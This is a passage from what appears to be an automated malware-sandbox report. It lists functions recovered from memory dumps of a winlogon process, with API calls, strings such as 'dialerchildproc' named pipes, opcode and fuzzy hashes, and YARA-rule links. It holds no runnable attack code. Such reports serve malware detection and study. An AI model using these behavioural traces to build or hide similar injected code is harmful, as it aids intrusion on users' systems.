558 1f385b969e7-1f385b96a04 call 1f385b9abc8 557->558 558->507
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575121677.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                      • API String ID: 190073905-1786718095
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: 4409f07fb228c0d555485b01c2f5db390ec7bc0f911a69b9524e815b9d6d2938
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: 6081AB3160060386FAD39F6594413F966A1ABE57E0FA48235BE25477DEFB3CCB468701
                                                                      Function 000001F385BF6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 561 1f385bf6910-1f385bf6916 562 1f385bf6951-1f385bf695b 561->562 563 1f385bf6918-1f385bf691b 561->563 564 1f385bf6a78-1f385bf6a8d 562->564 565 1f385bf691d-1f385bf6920 563->565 566 1f385bf6945-1f385bf6984 call 1f385bf6fc0 563->566 570 1f385bf6a8f 564->570 571 1f385bf6a9c-1f385bf6ab6 call 1f385bf6e54 564->571 568 1f385bf6922-1f385bf6925 565->568 569 1f385bf6938 __scrt_dllmain_crt_thread_attach 565->569 581 1f385bf6a52 566->581 582 1f385bf698a-1f385bf699f call 1f385bf6e54 566->582 573 1f385bf6931-1f385bf6936 call 1f385bf6f04 568->573 574 1f385bf6927-1f385bf6930 568->574 577 1f385bf693d-1f385bf6944 569->577 575 1f385bf6a91-1f385bf6a9b 570->575 584 1f385bf6aef-1f385bf6b20 call 1f385bf7190 571->584 585 1f385bf6ab8-1f385bf6aed call 1f385bf6f7c call 1f385bf6e1c call 1f385bf7318 call 1f385bf7130 call 1f385bf7154 call 1f385bf6fac 571->585 573->577 586 1f385bf6a54-1f385bf6a69 581->586 594 1f385bf6a6a-1f385bf6a77 call 1f385bf7190 582->594 595 1f385bf69a5-1f385bf69b6 call 1f385bf6ec4 582->595 596 1f385bf6b22-1f385bf6b28 584->596 597 1f385bf6b31-1f385bf6b37 584->597 585->575 594->564 614 1f385bf69b8-1f385bf69dc call 1f385bf72dc call 1f385bf6e0c call 1f385bf6e38 call 1f385bfac0c 595->614 615 1f385bf6a07-1f385bf6a11 call 1f385bf7130 595->615 596->597 603 1f385bf6b2a-1f385bf6b2c 596->603 598 1f385bf6b7e-1f385bf6b94 call 1f385bf268c 597->598 599 1f385bf6b39-1f385bf6b43 597->599 622 1f385bf6bcc-1f385bf6bce 598->622 623 1f385bf6b96-1f385bf6b98 598->623 605 1f385bf6b4f-1f385bf6b5d call 1f385c05780 599->605 606 1f385bf6b45-1f385bf6b4d 599->606 604 1f385bf6c1f-1f385bf6c2c 603->604 611 1f385bf6b63-1f385bf6b78 call 1f385bf6910 605->611 626 1f385bf6c15-1f385bf6c1d 605->626 606->611 611->598 611->626 614->615 664 1f385bf69de-1f385bf69e5 __scrt_dllmain_after_initialize_c 614->664 615->581 634 1f385bf6a13-1f385bf6a1f call 1f385bf7180 615->634 624 1f385bf6bd0-1f385bf6bd3 622->624 625 1f385bf6bd5-1f385bf6bea call 1f385bf6910 622->625 623->622 631 1f385bf6b9a-1f385bf6bbc call 1f385bf268c call 1f385bf6a78 623->631 624->625 624->626 625->626 644 1f385bf6bec-1f385bf6bf6 625->644 626->604 631->622 656 1f385bf6bbe-1f385bf6bc6 call 1f385c05780 631->656 653 1f385bf6a21-1f385bf6a2b call 1f385bf7098 634->653 654 1f385bf6a45-1f385bf6a50 634->654 650 1f385bf6c01-1f385bf6c11 call 1f385c05780 644->650 651 1f385bf6bf8-1f385bf6bff 644->651 650->626 651->626 653->654 663 1f385bf6a2d-1f385bf6a3b 653->663 654->586 656->622 663->654 664->615 665 1f385bf69e7-1f385bf6a04 call 1f385bfabc8 664->665 665->615
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575560099.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                      • API String ID: 190073905-1786718095
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: dd5b60a4949fe2c9e32b5ccc5ae674ce106a1ad1d7178672b7aede5bfdb929d8
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: E381903260060387FAD69FA594413F962A0ABE57E0F94A235BD65C77DEDB3CCB458700
                                                                      Function 000001F385BCCE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32 ref: 000001F385BCCE37
                                                                      • FlsGetValue.KERNEL32(?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCE4C
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCE6D
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCE9A
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCEAB
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCEBC
                                                                      • SetLastError.KERNEL32 ref: 000001F385BCCED7
                                                                      • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCF0D
                                                                      • FlsSetValue.KERNEL32(?,?,00000001,000001F385BCECCC,?,?,?,?,000001F385BCBF9F,?,?,?,?,?,000001F385BC7AB0), ref: 000001F385BCCF2C
                                                                        • Part of subcall function 000001F385BCD6CC: HeapAlloc.KERNEL32 ref: 000001F385BCD721
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCF54
                                                                        • Part of subcall function 000001F385BCD744: HeapFree.KERNEL32 ref: 000001F385BCD75A
                                                                        • Part of subcall function 000001F385BCD744: GetLastError.KERNEL32 ref: 000001F385BCD764
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCF65
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCF76
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast$Heap$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 570795689-0
                                                                      • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                      • Instruction ID: ab4e86b80bad7de7d9fc3ab59b2f76ba8cf21dcb8283221406096f04f5b2af92
                                                                      • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                      • Instruction Fuzzy Hash: A9415D3024168786FAEBA73555553F926829BF67F0F280734BD36466EEDE2C9F018608
                                                                      Function 000001F385BC2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                      • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                      • API String ID: 2171963597-1373409510
                                                                      • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                      • Instruction ID: b1f9f93cb01f113d9316950de3058d2bf3c52726d10c2abd083118da5a752f1a
                                                                      • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                      • Instruction Fuzzy Hash: 9B213D3261464286EB518B25E4443A963A0F7D9BE4F944325FEA903BE8CF7CC649CB04
                                                                      Function 000001F385B99944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575121677.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction ID: 89869763d31d70a6664f7afe8390858ba70db1f617f2886a7312f5174378804d
                                                                      • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction Fuzzy Hash: BCE1AE32604B4286EBE29B25D4813FD37A1F7E57E8F100225FE6957B99EB38C290C741
                                                                      Function 000001F385BCA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction ID: aaf1cc35d11ae05a2632683eb1bd403c02529057552cc08f6e5be18958e980d5
                                                                      • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction Fuzzy Hash: 9BE1A07260474186EBA2DF65D4813ED77A0F7A4BE8F100225FEA957BD9CB38DA81C704
                                                                      Function 000001F385BF9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575560099.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction ID: 118cde429f331ccbb9c347859f0b6c357bc9266cc281f8d3d7d51a4fe7ca9d13
                                                                      • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction Fuzzy Hash: E4E19E3260474287EBA59FA5D4813ED77A1F7A57E8F100225FE6997B9ECB38C291C700
                                                                      Function 000001F385BCF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeLibraryProc
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 3013587201-537541572
                                                                      • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction ID: d636cb6fcfe5ac36cb180e2c1fe7e0ac221cfd02b4f72b76c9f1893fc7a1ecf8
                                                                      • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction Fuzzy Hash: E141BF32311A0291EA97CB16A8007F52395FBA5BF0F594375BD2A877CCEA3CCA458308
                                                                      Function 000001F385BC104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                      • String ID: d
                                                                      • API String ID: 3743429067-2564639436
                                                                      • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction ID: 01501970025b8a16af69953ccfeb273e0ae5138ac2b6fb46539807bede4d7400
                                                                      • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction Fuzzy Hash: EA417E32214B85C6E7A1CF61E4443AA77A1F398BD8F548229EE991779CDF3CC945CB00
                                                                      Function 000001F385BCD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FlsGetValue.KERNEL32(?,?,?,000001F385BCC7DE,?,?,?,?,?,?,?,?,000001F385BCCF9D,?,?,00000001), ref: 000001F385BCD087
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001F385BCC7DE,?,?,?,?,?,?,?,?,000001F385BCCF9D,?,?,00000001), ref: 000001F385BCD0A6
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001F385BCC7DE,?,?,?,?,?,?,?,?,000001F385BCCF9D,?,?,00000001), ref: 000001F385BCD0CE
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001F385BCC7DE,?,?,?,?,?,?,?,?,000001F385BCCF9D,?,?,00000001), ref: 000001F385BCD0DF
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001F385BCC7DE,?,?,?,?,?,?,?,?,000001F385BCCF9D,?,?,00000001), ref: 000001F385BCD0F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID: 1%$Y%
                                                                      • API String ID: 3702945584-1395475152
                                                                      • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction ID: 7b0f6b2b2c262150a3e5074f4c0839de0ecc50569b3260bde6390161f78a9210
                                                                      • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction Fuzzy Hash: 66111C347042C645FAFBA72959523F962419BE47F0F6847B5BC39466EEDE2CCF028608
                                                                      Function 000001F385BC7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: ef941430167cb6942911e2266a7754952b4ee9def37cad19c030d044e1fadb84
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: 27818B7161060386FBD6AB2A94413F96290AFE57E0F544639BE38477DEDA3CCF498708
                                                                      Function 000001F385BC9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction ID: f2fc9e50d80dcf80fc4ca459e6f8d64556b7fcd08f0b3d7ca7df50233bdedf36
                                                                      • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction Fuzzy Hash: 1A31B031212A02D1FE979B42A4007F42295B7A9BF0F590735BD394B7D8EF3CDA498308
                                                                      Function 000001F385BD3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                      • Instruction ID: 24ee0d3c3fdf8dc854bf28b68e46fc9f908ee672aa9e0ff533891e641e7e60b3
                                                                      • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                      • Instruction Fuzzy Hash: E2115E31210A4286E7918B56E84436966A0F7E8FF4F544334FE6A877D9CB7CCA148740
                                                                      Function 000001F385BC2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID: dialer
                                                                      • API String ID: 756756679-3528709123
                                                                      • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction ID: 9479a4e4da195d168078971477690de0f7ba99455b5b0671873ad8e27db6120e
                                                                      • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction Fuzzy Hash: CF31B736701B5682EE96CF56D5407B9A790FBE4BE0F484230BE9847B99EF3CC9618704
                                                                      Function 000001F385BCCFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2506987500-0
                                                                      • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction ID: 69f9c49218e6240ed086ec77233dbfdd9bb5dabba28c9c0c825df301cb3e1b49
                                                                      • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction Fuzzy Hash: A0116D342406C286FAEBA72555553FD6242ABF47F0F644774BC3647ADEDE6C8F018608
                                                                      Function 000001F385BC199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID:
                                                                      • API String ID: 517849248-0
                                                                      • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction ID: 6c8d3d93d8bfe3e2fe73925eee48ded896e6dd9d42efc55a8fd521349c15dbea
                                                                      • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction Fuzzy Hash: 87016D31300B4282EB95DF52A4483A963A1F798BD1F984135FE6953798DF3CCA49C700
                                                                      Function 000001F385BC36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                      • String ID:
                                                                      • API String ID: 449555515-0
                                                                      • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction ID: 7d372f96bd39070a0a19211413c30f0155ca6cd9137a14114fdefad3a2692b6c
                                                                      • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction Fuzzy Hash: 4001A134201B0282EFA69F51E8087A563A0BBA4BE1F440635ED69073D8EF3CC6048704
                                                                      Function 000001F385BC8FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 2395640692-629598281
                                                                      • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                      • Instruction ID: 287f6c13025e1d40a38e87b4e27fb4647a666ef3d6ef84ad5c099290c8d91569
                                                                      • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                      • Instruction Fuzzy Hash: 73518232201602DAF7968B15D449BA93756F3A4BE8F618234FE264778CDB39EE41C708
                                                                      Function 000001F385BC1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                      • String ID: \\?\
                                                                      • API String ID: 2719912262-4282027825
                                                                      • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                      • Instruction ID: bc5ae32632339b533cef1b2197eac90a425d8e38398b469f5566d1ddc85980dc
                                                                      • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                      • Instruction Fuzzy Hash: E4F0363230464292E7A18F15E8847A96760F7987E8FD44130FE594759CDA2CC74DCB04
                                                                      Function 000001F385BCBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction ID: 8d4205d73ecca294230dc073d23a78a6a4ff33a72a55b65ea912a8e03c6c850f
                                                                      • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction Fuzzy Hash: CCF0627121160681EB558F24E4443FA6320FBE47F1F940329FE7A461E8DF2DC7488340
                                                                      Function 000001F385BC3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CombinePath
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3422762182-91387939
                                                                      • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
